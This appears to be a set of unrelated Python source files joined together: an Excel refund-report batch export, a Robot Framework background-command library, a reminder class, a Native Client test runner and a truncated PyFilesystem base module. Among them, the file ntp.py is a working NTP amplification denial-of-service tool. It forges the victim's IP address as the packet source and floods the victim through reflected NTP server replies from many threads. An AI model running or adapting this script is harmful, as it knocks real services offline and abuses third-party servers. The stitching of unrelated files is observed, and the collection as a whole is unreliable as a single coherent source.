worksheet.write(row, 2 ,data["transactionSum"], money_format)
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드_기간별_환불합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ')_' + str(fileCnt) + '.xlsx'
# Recreate the file when (DB fetch count * 2) rows have been written; the fileCnt suffix keeps earlier files from being overwritten
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"환불금액", title_format)
row += 1
worksheet.write(row, 0 ,"", summary_money_format)
worksheet.write(row, 1 ,"", summary_money_format)
worksheet.write(row, 2 ,summaryData["transactionSum"], summary_money_format)
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드_기간별_환불합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ')_' + str(fileCnt) + '.xlsx'
# Recreate the file when (DB fetch count * 2) rows have been written; the fileCnt suffix keeps earlier files from being overwritten
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"환불금액", title_format)
queryData["offset"] = queryData["offset"] + EXCEL_FILE_DOWNLOAD_COUNT
if len(searchData["data"])+1 < EXCEL_FILE_DOWNLOAD_COUNT :
break
workbook.close()
excelZip = zipfile.ZipFile(os.path.join(uploads ,zipFileName),'w')
for folder, subfolders, files in os.walk(uploads):
for file in files:
if file.endswith('.xlsx'):
excelZip.write(os.path.join(folder ,file), setUnicodeFormatToEucKr(file), compress_type=zipfile.ZIP_DEFLATED)
except Exception as err:
# Record the error message
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0003" , # 진행중
"errMsg" : str(err)
})
jobStatus = 1
print err
finally:
if excelZip != None:
excelZip.close()
if jobStatus == 0 :
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0002" , # 진행중
"errMsg" : ""
})
# Record the success message
print "성공"
|
AChannel.py
|
# -*- coding: utf-8 -*-
# Copyright 2017-2020 NTT Communications
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading,traceback,time,datetime
import Common,VChannel
from robot.libraries.BuiltIn import BuiltIn
import robot.libraries.DateTime as DateTime
def _thread_cmd(self,cmd):
try:
channel = self._channels[self._current_name]
self._cmd(cmd)
except Exception as err:
BuiltIn().log("WARN: A running thread for channel `%s` is \
terminated" % (channel['node']),console=False)
BuiltIn().log(err,console=False)
BuiltIn().log(traceback.format_exc(),console=False)
def _thread_repeat_cmd(stop,self,cmd,interval,with_time):
try:
channel = self._channels[self._current_name]
if with_time:
mark = datetime.datetime.now().strftime("%I:%M:%S%p on %B %d, %Y: ")
else:
mark = ""
while not stop.is_set():
self._cmd(cmd)
self.log("\n---%s---\n" % mark,channel)
time.sleep(DateTime.convert_time(interval))
except Exception as err:
BuiltIn().log("WARN: A running thread for channel `%s` is \
terminated" % (channel['node']),console=False)
BuiltIn().log(err,console=False)
BuiltIn().log(traceback.format_exc(),console=False)
class AChannel(VChannel.VChannel):
""" AChannel derives from VChannel and is used for parallel actions \
besides the main scenario.
Like VChannel, AChannel handles a virtual terminal for each node.
While `VChannel.Cmd` is a blocking keyword, `AChannel.Cmd` is a
non-blocking keyword. When using `Cmd`, users need to control when the
command finishes its work.
"""
def __init__(self):
super(AChannel,self).__init__(u"_")
self._cmd_threads = {}
self._cmd_thread_id = 0
def cmd(self,cmd=''):
""" Exececutes a command in background
- `cmd`: a command
Returns an id that could be used for `Cmd Wait`
"""
self._cmd_thread_id += 1
thread_id = self._cmd_thread_id
self._cmd_threads[thread_id] = {}
thread = threading.Thread(target=_thread_cmd,args=(self,cmd))
thread.start()
self._cmd_threads[thread_id]['thread'] = thread
self._cmd_threads[thread_id]['stop'] = None
BuiltIn().log("Started command `%s` in other thread" % cmd)
return thread_id
def wait_cmd(self,exec_id,timeout=u'0s'):
""" Waits until a background command finishes or timeout
"""
time_s = DateTime.convert_time(timeout)
thread = self._cmd_threads[exec_id]['thread']
thread.join(time_s)
BuiltIn().log("Waited until cmd thread finished")
def stop_repeat_cmd(self,exec_id,timeout=u'0s'):
""" Stops a runnin Repeat Command by its `exec_id`
- `exec_id`: an ID return when using Cmd
"""
time_s = DateTime.convert_time(timeout)
thread = self._cmd_threads[exec_id]['thread']
stop = self._cmd_threads[exec_id]['stop']
if stop:
stop.set()
thread.join(time_s)
BuiltIn().log("Stopped a repeated command")
def repeat_cmd(self,cmd='',interval='1',with_time=True):
""" Repeat a command with `interval`
When `with_time` is ${TRUE}, a time mark will be inserted between output
of the command
"""
stop = threading.Event()
self._cmd_thread_id += 1
thread_id = self._cmd_thread_id
self._cmd_threads[thread_id] = {}
thread = threading.Thread(target=_thread_repeat_cmd,args=(stop,self,cmd,interval,with_time))
thread.start()
self._cmd_threads[thread_id]['thread'] = thread
self._cmd_threads[thread_id]['stop'] = stop
BuiltIn().log("Started command `%s` in other thread" % cmd)
return thread_id
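# Illustrative usage sketch (comments only, not part of the original library): how the
# keywords above might be combined in a Robot Framework test case. The node command,
# intervals, and the `AChannel.` prefix are assumptions.
#
#   ${id}=      AChannel.Cmd            show log messages | no-more
#   # ... do other work while the command runs in the background ...
#   AChannel.Wait Cmd                   ${id}     timeout=30s
#
#   ${rid}=     AChannel.Repeat Cmd     show system processes     interval=10s
#   Sleep       60s
#   AChannel.Stop Repeat Cmd            ${rid}    timeout=5s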
|
ntp.py
|
#!/usr/bin/env https://github.com/Tandelajr/mr.tandela
# MIT License
#
# Copyright (C) 2020, Entynetproject. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
import time
from scapy.all import IP, send, Raw, UDP
from threading import Thread
def NTP_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting NTP attack...")
# Payload
payload = ("\x17\x00\x03\x2a" + "\x00" * 4)
threads_list = []
# Load NTP servers list
with open("tools/other/ntp_servers.txt", 'r') as f:
ntp_servers = f.readlines()
# NTP flood
def ntp_flood():
global FINISH
while not FINISH:
for server in ntp_servers:
if not FINISH:
# Packet
packets = random.randint(10, 150)
server = server.replace("\n", "")
try:
packet = IP(dst = server, src = target_ip) / UDP(sport = random.randint(2000,65535), dport = int(target_port)) / Raw(load = payload)
send( packet, count = packets, verbose = False)
except Exception as e:
print(e)
else:
print("\033[1;34m"+"[*]"+"\033[0m"+" Sending " + str(packets) + " packets from NTP server: " + server + " to " + target + "...")
# Start threads
for thread in range(threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = ntp_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
|
task.py
|
from threading import Thread
import time
import easygui
class Task:
def __init__(self, remind_interval, completion_date, next_remind, description):
self.remind_interval = remind_interval
self.completion_date = completion_date
self.next_remind = next_remind
self.description = description
def next_alert(self):
ct = time.time()
if ct<=self.next_remind:
return self.next_remind - ct
else:
if self.completion_date-self.remind_interval < ct:
return 0
else:
return (self.completion_date - ct)%self.remind_interval
def show_reminders(self):
if time.time()>=self.completion_date:
print("event finished")
return
elif self.remind_interval <=0:
print("invalid interval")
return
else:
easygui.msgbox(self.description)
self.next_remind += self.remind_interval
time.sleep(self.remind_interval)
self.show_reminders()
return
def start_reminder(self):
time.sleep(self.next_alert())
self.show_reminders()
return
def start_alerts(self):
thread = Thread(target = self.start_reminder)
thread.start()
return
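# Illustrative usage sketch (assumption: all times are Unix timestamps in seconds, and
# easygui is available to display the pop-up reminder).
if __name__ == "__main__":
    now = time.time()
    demo = Task(remind_interval=600,            # remind every 10 minutes
                completion_date=now + 3600,     # task is due in one hour
                next_remind=now + 600,          # first reminder in 10 minutes
                description="Submit the report")
    demo.start_alerts()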
|
run-tests.py
|
#!/usr/bin/env python
# Copyright 2015 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import difflib
import fnmatch
import multiprocessing
import os
import Queue
import re
import shlex
import subprocess
import sys
import time
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
REPO_ROOT_DIR = os.path.dirname(SCRIPT_DIR)
DEFAULT_PNACL_EXE = os.path.join(REPO_ROOT_DIR, 'out', 'pnacl-opt-assert')
class Error(Exception):
pass
def AsList(value):
if value is None:
return []
elif type(value) is list:
return value
else:
return [value]
def Indent(s, spaces):
return ''.join(' '*spaces + l for l in s.splitlines(1))
def DiffLines(expected, actual):
expected_lines = expected.splitlines(1)
actual_lines = actual.splitlines(1)
return list(difflib.unified_diff(expected_lines, actual_lines,
fromfile='expected', tofile='actual'))
def FindTestFiles(directory, ext, filter_pattern_re):
tests = []
for root, dirs, files in os.walk(directory):
for f in files:
path = os.path.join(root, f)
if os.path.splitext(f)[1] == ext:
tests.append(os.path.relpath(path, SCRIPT_DIR))
tests.sort()
return [test for test in tests if re.match(filter_pattern_re, test)]
class TestInfo(object):
def __init__(self):
self.name = ''
self.header_lines = []
self.stdout_file = None
self.expected_stdout = ''
self.expected_stderr = ''
self.exe = None
self.pexe = ''
self.flags = []
self.args = []
self.expected_error = 0
self.slow = False
def Parse(self, filename):
self.name = filename
with open(filename) as f:
seen_keys = set()
state = 'header'
empty = True
header_lines = []
stdout_lines = []
stderr_lines = []
for line in f.readlines():
empty = False
m = re.match(r'\s*#(.*)$', line)
if m:
if state == 'stdout':
raise Error('unexpected directive in STDOUT block: %s' % line)
directive = m.group(1).strip()
if directive.lower() == 'stdout:':
if 'stdout_file' in seen_keys:
raise Error('can\'t have stdout section and stdout file')
state = 'stdout'
continue
if state != 'header':
raise Error('unexpected directive: %s' % line)
key, value = directive.split(':')
key = key.strip().lower()
value = value.strip()
if key in seen_keys:
raise Error('%s already set' % key)
seen_keys.add(key)
if key == 'exe':
self.exe = value
elif key == 'flags':
self.flags = shlex.split(value)
elif key == 'file':
self.pexe = value
elif key == 'error':
self.expected_error = int(value)
elif key == 'args':
self.args = shlex.split(value)
elif key == 'stdout_file':
self.stdout_file = value
with open(self.stdout_file) as s:
self.expected_stdout = s.read()
elif key == 'slow':
self.slow = True
else:
raise Error('Unknown directive: %s' % key)
elif state == 'header':
state = 'stderr'
if state == 'header':
header_lines.append(line)
elif state == 'stderr':
stderr_lines.append(line)
elif state == 'stdout':
stdout_lines.append(line)
if empty:
raise Error('empty test file')
self.header = ''.join(header_lines)
if not self.stdout_file:
self.expected_stdout = ''.join(stdout_lines)
self.expected_stderr = ''.join(stderr_lines)
def GetExecutable(self, override_exe):
if override_exe:
exe = override_exe
elif self.exe:
exe = os.path.join(REPO_ROOT_DIR, self.exe)
else:
exe = DEFAULT_PNACL_EXE
return os.path.relpath(exe, SCRIPT_DIR)
def GetCommand(self, override_exe=None):
cmd = [self.GetExecutable(override_exe)]
cmd += self.flags
cmd += AsList(self.pexe)
cmd += ['--'] + AsList(self.args)
return cmd
def Run(self, override_exe=None):
# Pass 'pnacl' as the executable name so the output is consistent
cmd = ['pnacl'] + self.GetCommand(override_exe)[1:]
exe = self.GetExecutable(override_exe)
try:
start_time = time.time()
process = subprocess.Popen(cmd, executable=exe, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
duration = time.time() - start_time
except OSError as e:
raise Error(str(e))
return stdout, stderr, process.returncode, duration
def Rebase(self, stdout, stderr):
with open(self.name, 'w') as f:
f.write(self.header)
f.write(stderr)
if self.stdout_file:
with open(self.stdout_file, 'w') as s:
s.write(stdout)
elif stdout:
f.write('# STDOUT:\n')
f.write(stdout)
def Diff(self, stdout, stderr):
if self.expected_stderr != stderr:
diff_lines = DiffLines(self.expected_stderr, stderr)
raise Error('stderr mismatch:\n' + ''.join(diff_lines))
if self.expected_stdout != stdout:
if self.stdout_file:
raise Error('stdout binary mismatch')
else:
diff_lines = DiffLines(self.expected_stdout, stdout)
raise Error('stdout mismatch:\n' + ''.join(diff_lines))
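# Illustrative example of the test-file layout parsed by TestInfo.Parse() above (inferred
# from the parser, not taken verbatim from the repository): '#' directive lines form the
# header, the following plain lines are the expected stderr, and an optional '# STDOUT:'
# directive starts the expected stdout block. The file names and flags are hypothetical.
#
#   # exe: out/pnacl-opt-assert
#   # file: simple.pexe
#   # flags: --verbose
#   # error: 0
#   <expected stderr lines...>
#   # STDOUT:
#   <expected stdout lines...>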
class Status(object):
def __init__(self, verbose):
self.verbose = verbose
self.start_time = None
self.last_length = 0
self.last_finished = None
self.passed = 0
self.failed = 0
self.total = 0
self.failed_tests = []
def Start(self, total):
self.total = total
self.start_time = time.time()
def Passed(self, info, duration):
self.passed += 1
if self.verbose:
sys.stderr.write('+ %s (%.3fs)\n' % (info.name, duration))
else:
self.Clear()
self._PrintShortStatus(info)
sys.stderr.flush()
def Failed(self, info, error_msg):
self.failed += 1
self.failed_tests.append(info)
self.Clear()
sys.stderr.write('- %s\n%s\n' % (info.name, Indent(error_msg, 2)))
def Skipped(self, info):
if self.verbose:
sys.stderr.write('. %s (skipped)\n' % info.name)
def Timeout(self):
self._PrintShortStatus(self.last_finished)
def Print(self):
self._PrintShortStatus(None)
sys.stderr.write('\n')
def _PrintShortStatus(self, info):
total_duration = time.time() - self.start_time
name = info.name if info else ''
percent = 100 * (self.passed + self.failed) / self.total
status = '[+%d|-%d|%%%d] (%.2fs) %s\r' % (self.passed, self.failed,
percent, total_duration, name)
self.last_length = len(status)
self.last_finished = info
sys.stderr.write(status)
def Clear(self):
if not self.verbose:
sys.stderr.write('%s\r' % (' ' * self.last_length))
def GetAllTestInfo(test_names, status):
infos = []
for test_name in test_names:
info = TestInfo()
try:
info.Parse(test_name)
infos.append(info)
except Error as e:
status.Failed(info, str(e))
return infos
def main(args):
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--executable', help='override executable.')
parser.add_argument('-v', '--verbose', help='print more diagnostic messages.',
action='store_true')
parser.add_argument('-l', '--list', help='list all tests.',
action='store_true')
parser.add_argument('--list-exes',
help='list all executables needed for the tests.',
action='store_true')
parser.add_argument('-r', '--rebase',
help='rebase a test to its current output.',
action='store_true')
parser.add_argument('-s', '--slow', help='run slow tests.',
action='store_true')
parser.add_argument('-j', '--jobs', help='number of jobs to use to run tests',
type=int, default=multiprocessing.cpu_count())
parser.add_argument('patterns', metavar='pattern', nargs='*',
help='test patterns.')
options = parser.parse_args(args)
if options.patterns:
pattern_re = '|'.join(fnmatch.translate('*%s*' % p)
for p in options.patterns)
else:
pattern_re = '.*'
test_names = FindTestFiles(SCRIPT_DIR, '.txt', pattern_re)
if options.list:
for test_name in test_names:
print test_name
return 0
if options.executable:
if not os.path.exists(options.executable):
parser.error('executable %s does not exist' % options.executable)
options.executable = os.path.abspath(options.executable)
run_cwd = os.getcwd()
os.chdir(SCRIPT_DIR)
isatty = os.isatty(1)
status = Status(options.verbose)
infos = GetAllTestInfo(test_names, status)
if options.list_exes:
exes = set([info.exe for info in infos])
if None in exes:
exes.remove(None)
exes.add(os.path.relpath(DEFAULT_PNACL_EXE, run_cwd))
print '\n'.join(exes)
return 0
inq = multiprocessing.Queue()
test_count = 0
for info in infos:
if not options.slow and info.slow:
status.Skipped(info)
continue
inq.put(info)
test_count += 1
outq = multiprocessing.Queue()
num_proc = options.jobs
processes = []
status.Start(test_count)
def Worker(options, inq, outq):
while True:
try:
info = inq.get(False)
try:
out = info.Run(options.executable)
except Error as e:
outq.put((info, e))
continue
outq.put((info, out))
except Queue.Empty:
# Seems this can be fired even when the queue isn't actually empty.
# Double-check, via inq.empty()
if inq.empty():
break
try:
for p in range(num_proc):
proc = multiprocessing.Process(target=Worker, args=(options, inq, outq))
processes.append(proc)
proc.start()
finished_tests = 0
while finished_tests < test_count:
try:
info, result = outq.get(True, 0.01)
except Queue.Empty:
status.Timeout()
continue
finished_tests += 1
try:
if isinstance(result, Error):
raise result
stdout, stderr, returncode, duration = result
if returncode != info.expected_error:
# This test has already failed, but diff it anyway.
msg = 'expected error code %d, got %d.' % (info.expected_error,
returncode)
try:
info.Diff(stdout, stderr)
except Error as e:
msg += '\n' + str(e)
raise Error(msg)
else:
if options.rebase:
info.Rebase(stdout, stderr)
else:
info.Diff(stdout, stderr)
status.Passed(info, duration)
except Error as e:
status.Failed(info, str(e))
finally:
for proc in processes:
proc.terminate()
proc.join()
status.Clear()
ret = 0
if status.failed:
sys.stderr.write('**** FAILED %s\n' % ('*' * (80 - 14)))
for info in status.failed_tests:
name = info.name
cmd = info.GetCommand(options.executable)
exe = os.path.relpath(info.GetExecutable(options.executable), run_cwd)
msg = Indent('cmd = (cd %s && %s)\n' % (
os.path.relpath(SCRIPT_DIR, run_cwd), ' '.join(cmd)), 2)
msg += Indent('rerun = %s\n' % ' '.join(
[sys.executable, sys.argv[0], '-e', exe, name]), 2)
sys.stderr.write('- %s\n%s\n' % (name, msg))
ret = 1
status.Print()
return ret
if __name__ == '__main__':
try:
sys.exit(main(sys.argv[1:]))
except Error as e:
sys.stderr.write(str(e) + '\n')
sys.exit(1)
|
base.py
|
#!/usr/bin/env python
"""
fs.base
=======
This module defines the most basic filesystem abstraction, the FS class.
Instances of FS represent a filesystem containing files and directories
that can be queried and manipulated. To implement a new kind of filesystem,
start by subclassing the base FS class.
For more information regarding implementing a working PyFilesystem interface, see :ref:`implementers`.
"""
__all__ = ['DummyLock',
'silence_fserrors',
'NullFile',
'synchronize',
'FS',
'flags_to_mode',
'NoDefaultMeta']
import os
import os.path
import shutil
import fnmatch
import re  # needed for the wildcard matching in _listdir_helper() and walk()
import datetime
import time
try:
import threading
except ImportError:
import dummy_threading as threading
from fs.path import *
from fs.errors import *
from fs.local_functools import wraps
class DummyLock(object):
"""A dummy lock object that doesn't do anything.
This is used as a placeholder when locking is disabled. We can't
directly use the Lock class from the dummy_threading module, since
it attempts to sanity-check the sequence of acquire/release calls
in a way that breaks when real threading is available.
"""
def acquire(self, blocking=1):
"""Acquiring a DummyLock always succeeds."""
return 1
def release(self):
"""Releasing a DummyLock always succeeds."""
pass
def __enter__(self):
pass
def __exit__(self, *args):
pass
def silence_fserrors(f, *args, **kwargs):
"""Perform a function call and return ``None`` if an :class:`fs.errors.FSError` is thrown
:param f: Function to call
:param args: Parameters to f
:param kwargs: Keyword parameters to f
"""
try:
return f(*args, **kwargs)
except FSError:
return None
class NoDefaultMeta(object):
"""A singleton used to signify that there is no default for getmeta"""
pass
class NullFile(object):
"""A NullFile is a file object that has no functionality.
Null files are returned by the :meth:`fs.base.FS.safeopen` method in FS objects when the
file doesn't exist. This can simplify code by negating the need to check
if a file exists, or handling exceptions.
"""
def __init__(self):
self.closed = False
def __iter__(self):
return self
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.closed = True
def flush(self):
pass
def next(self):
raise StopIteration
def readline(self, *args, **kwargs):
return ""
def close(self):
self.closed = True
def read(self, size=None):
return ""
def seek(self, *args, **kwargs):
pass
def tell(self):
return 0
def truncate(self, *args, **kwargs):
return 0
def write(self, data):
pass
def writelines(self, *args, **kwargs):
pass
def synchronize(func):
"""Decorator to synchronize a method on self._lock."""
@wraps(func)
def acquire_lock(self, *args, **kwargs):
self._lock.acquire()
try:
return func(self, *args, **kwargs)
finally:
self._lock.release()
return acquire_lock
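# Illustrative sketch (comments only, not part of the original module): a subclass method
# guarded by the synchronize decorator above. The subclass and method body are hypothetical.
#
#   class MyFS(FS):
#       def __init__(self):
#           super(MyFS, self).__init__(thread_synchronize=True)
#       @synchronize
#       def remove(self, path):
#           ...  # runs with self._lock held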
class FS(object):
"""The base class for Filesystem abstraction objects.
An instance of a class derived from FS is an abstraction on some kind of filesystem, such as the OS filesystem or a zip file.
"""
_meta = {}
def __init__(self, thread_synchronize=False):
"""The base class for Filesystem objects.
:param thread_synchronize: If True, a lock object will be created for the object, otherwise a dummy lock will be used.
:type thread_synchronize: bool
"""
super(FS, self).__init__()
self.closed = False
self.thread_synchronize = thread_synchronize
if thread_synchronize:
self._lock = threading.RLock()
else:
self._lock = DummyLock()
def __del__(self):
if not getattr(self, 'closed', True):
self.close()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def cachehint(self, enabled):
"""Recommends the use of caching. Implementations are free to use or
ignore this value.
:param enabled: If True the implementation is permitted to aggressively cache directory
structure / file information. Caching such information can speed up many operations,
particularly for network based filesystems. The downside of caching is that
changes made to directories or files outside of this interface may not be picked up immediately.
"""
pass
# Deprecating cache_hint in favour of no underscore version, for consistency
cache_hint = cachehint
def close(self):
"""Close the filesystem. This will perform any shutdown related
operations required. This method will be called automatically when
the filesystem object is garbage collected, but it is good practice
to call it explicitly so that any attached resources are freed when they
are no longer required.
"""
self.closed = True
def __getstate__(self):
# Locks can't be pickled, so instead we just indicate the
# type of lock that should be there. None == no lock,
# True == a proper lock, False == a dummy lock.
state = self.__dict__.copy()
lock = state.get("_lock",None)
if lock is not None:
if isinstance(lock,threading._RLock):
state["_lock"] = True
else:
state["_lock"] = False
return state
def __setstate__(self,state):
self.__dict__.update(state)
lock = state.get("_lock")
if lock is not None:
if lock:
self._lock = threading.RLock()
else:
self._lock = DummyLock()
def getmeta(self, meta_name, default=NoDefaultMeta):
"""Retrieve a meta value associated with an FS object.
Meta values are a way for an FS implementation to report potentially
useful information associated with the file system.
A meta key is a lower case string with no spaces. Meta keys may also
be grouped in namespaces in a dotted notation, e.g. 'atomic.namespaces'.
FS implementations aren't obliged to return any meta values, but the
following are common:
* *read_only* True if the file system cannot be modified
* *thread_safe* True if the implementation is thread safe
* *network* True if the file system requires network access
* *unicode_paths* True if the file system supports unicode paths
* *case_insensitive_paths* True if the file system ignores the case of paths
* *atomic.makedir* True if making a directory is an atomic operation
* *atomic.rename* True if rename is an atomic operation, (and not implemented as a copy followed by a delete)
* *atomic.setcontents* True if the implementation supports setting the contents of a file as an atomic operation (without opening a file)
* *free_space* The free space (in bytes) available on the file system
* *total_space* The total space (in bytes) available on the file system
* *virtual* True if the filesystem defers to other filesystems
FS implementations may expose non-generic meta data through a self-named namespace. e.g. ``"somefs.some_meta"``
Since no meta value is guaranteed to exist, it is advisable to always supply a
default value to ``getmeta``.
:param meta_name: The name of the meta value to retrieve
:param default: An optional default to return if the meta value isn't present
:raises `fs.errors.NoMetaError`: If specified meta value is not present, and there is no default
"""
if meta_name not in self._meta:
if default is not NoDefaultMeta:
return default
raise NoMetaError(meta_name=meta_name)
return self._meta[meta_name]
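# Illustrative usage sketch: always pass a default when probing optional meta values,
# since implementations are not obliged to provide any of them.
#
#   if fs.getmeta('read_only', default=False):
#       raise RuntimeError('filesystem is read-only')
#   free = fs.getmeta('free_space', default=None)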
def hasmeta(self, meta_name):
"""Check that a meta value is supported
:param meta_name: The name of a meta value to check
:rtype: bool
"""
try:
self.getmeta(meta_name)
except NoMetaError:
return False
return True
def getsyspath(self, path, allow_none=False):
"""Returns the system path (a path recognized by the OS) if one is present.
If the path does not map to a system path (and `allow_none` is False)
then a NoSysPathError exception is thrown. Otherwise, the system
path will be returned as a unicode string.
:param path: a path within the filesystem
:param allow_none: if True, this method will return None when there is no system path,
rather than raising NoSysPathError
:type allow_none: bool
:raises `fs.errors.NoSysPathError`: if the path does not map on to a system path, and allow_none is set to False (default)
:rtype: unicode
"""
if not allow_none:
raise NoSysPathError(path=path)
return None
def hassyspath(self, path):
"""Check if the path maps to a system path (a path recognized by the OS).
:param path: path to check
:returns: True if `path` maps to a system path
:rtype: bool
"""
return self.getsyspath(path, allow_none=True) is not None
def getpathurl(self, path, allow_none=False):
"""Returns a url that corresponds to the given path, if one exists.
If the path does not have an equivalent URL form (and allow_none is False)
then a :class:`~fs.errors.NoPathURLError` exception is thrown. Otherwise the URL will be
returned as a unicode string.
:param path: a path within the filesystem
:param allow_none: if true, this method can return None if there is no
URL form of the given path
:type allow_none: bool
:raises `fs.errors.NoPathURLError`: If no URL form exists, and allow_none is False (the default)
:rtype: unicode
"""
if not allow_none:
raise NoPathURLError(path=path)
return None
def haspathurl(self, path):
"""Check if the path has an equivalent URL form
:param path: path to check
:returns: True if `path` has a URL form
:rtype: bool
"""
return self.getpathurl(path, allow_none=True) is not None
def open(self, path, mode="r", **kwargs):
"""Open a the given path as a file-like object.
:param path: a path to file that should be opened
:param mode: mode of file to open, identical to the mode string used
in 'file' and 'open' builtins
:param kwargs: additional (optional) keyword parameters that may
be required to open the file
:rtype: a file-like object
"""
raise UnsupportedError("open file")
def safeopen(self, path, mode="r", **kwargs):
"""Like :py:meth:`~fs.base.FS.open`, but returns a :py:class:`~fs.base.NullFile` if the file could not be opened.
A ``NullFile`` is a dummy file which has all the methods of a file-like object,
but contains no data.
:param path: a path to file that should be opened
:param mode: mode of file to open, identical to the mode string used
in 'file' and 'open' builtins
:param kwargs: additional (optional) keyword parameters that may
be required to open the file
:rtype: a file-like object
"""
try:
f = self.open(path, mode, **kwargs)
except ResourceNotFoundError:
return NullFile()
return f
def symlink(self, linkto, path):
"""Creates a symlink.
:param linkto: the target path the symlink points to.
:param path: the path at which to create the symlink.
:rtype: None
"""
raise UnsupportedError("symlink")
def readlink(self, path):
"""Reads a symlink.
:param path: the path of the link to read
:returns: the directory or file path the link points to
"""
raise UnsupportedError("readlink")
def chmod(self, path, mode):
"""Changes permissions of a file.
:param path: Path of a file.
:type path: string
:param mode: OR'ed combination of stat.S_* flags
:type mode: integer
"""
raise UnsupportedError("chmod")
def exists(self, path):
"""Check if a path references a valid resource.
:param path: A path in the filesystem
:rtype: bool
"""
return self.isfile(path) or self.isdir(path)
def isdir(self, path):
"""Check if a path references a directory.
:param path: a path in the filesystem
:rtype: bool
"""
raise UnsupportedError("check for directory")
def isfile(self, path):
"""Check if a path references a file.
:param path: a path in the filesystem
:rtype: bool
"""
raise UnsupportedError("check for file")
def __iter__(self):
""" Iterates over paths returned by :py:meth:`~fs.base.listdir` method with default params. """
for f in self.listdir():
yield f
def listdir(self, path="./",
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""Lists the the files and directories under a given path.
The directory contents are returned as a list of unicode paths.
:param path: root of the path to list
:type path: string
:param wildcard: Only returns paths that match this wildcard
:type wildcard: string containing a wildcard, or a callable that accepts a path and returns a boolean
:param full: returns full paths (relative to the root)
:type full: bool
:param absolute: returns absolute paths (paths beginning with /)
:type absolute: bool
:param dirs_only: if True, only return directories
:type dirs_only: bool
:param files_only: if True, only return files
:type files_only: bool
:rtype: iterable of paths
:raises `fs.errors.ResourceNotFoundError`: if the path is not found
:raises `fs.errors.ResourceInvalidError`: if the path exists, but is not a directory
"""
raise UnsupportedError("list directory")
def listdirinfo(self, path="./",
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""Retrieves a list of paths and path info under a given path.
This method behaves like listdir() but instead of just returning
the name of each item in the directory, it returns a tuple of the
name and the info dict as returned by getinfo.
This method may be more efficient than calling
:py:meth:`~fs.base.FS.getinfo` on each individual item returned by :py:meth:`~fs.base.FS.listdir`, particularly
for network based filesystems.
:param path: root of the path to list
:param wildcard: filter paths that match this wildcard
:param dirs_only: only retrieve directories
:type dirs_only: bool
:param files_only: only retrieve files
:type files_only: bool
:raises `fs.errors.ResourceNotFoundError`: If the path is not found
:raises `fs.errors.ResourceInvalidError`: If the path exists, but is not a directory
"""
path = normpath(path)
def getinfo(p):
try:
if full or absolute:
return self.getinfo(p)
else:
return self.getinfo(pathjoin(path,p))
except FSError:
return {}
return [(p, getinfo(p))
for p in self.listdir(path,
wildcard=wildcard,
full=full,
absolute=absolute,
dirs_only=dirs_only,
files_only=files_only)]
def _listdir_helper(self, path,
entries,
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""A helper method called by listdir method that applies filtering.
Given the path to a directory and a list of the names of entries within
that directory, this method applies the semantics of the listdir()
keyword arguments. An appropriately modified and filtered list of
directory entries is returned.
"""
if dirs_only and files_only:
raise ValueError("dirs_only and files_only can not both be True")
if wildcard is not None:
